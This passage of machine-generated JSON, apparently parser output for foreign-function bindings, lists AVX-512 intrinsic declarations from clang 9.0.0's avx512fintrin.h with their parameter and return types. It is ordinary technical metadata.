"__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4732:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4740:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4748:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4756:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4762:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4770:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4778:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4784:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4792:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4800:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4806:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4814:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4822:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4828:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4836:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4844:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4850:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4858:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4866:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4872:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4880:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4888:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4894:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4902:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4910:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4916:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4924:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4932:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4938:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4946:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4954:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4960:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4968:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5044:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5050:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5058:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5066:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5072:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5080:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5120:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5128:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5135:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5141:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5149:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5157:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5163:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5171:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5178:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5184:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5192:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5208:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_store_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5217:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_mov_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5224:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mov_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5232:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mov_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5240:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mov_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5248:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5256:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_store_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5273:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5280:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5287:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5295:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm_getexp_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_getexp_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5475:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_getexp_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5491:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_getexp_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5513:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_getexp_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5520:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_getexp_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5536:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm512_kmov", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5642:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_sll_epi32", "ns": 0, "location": 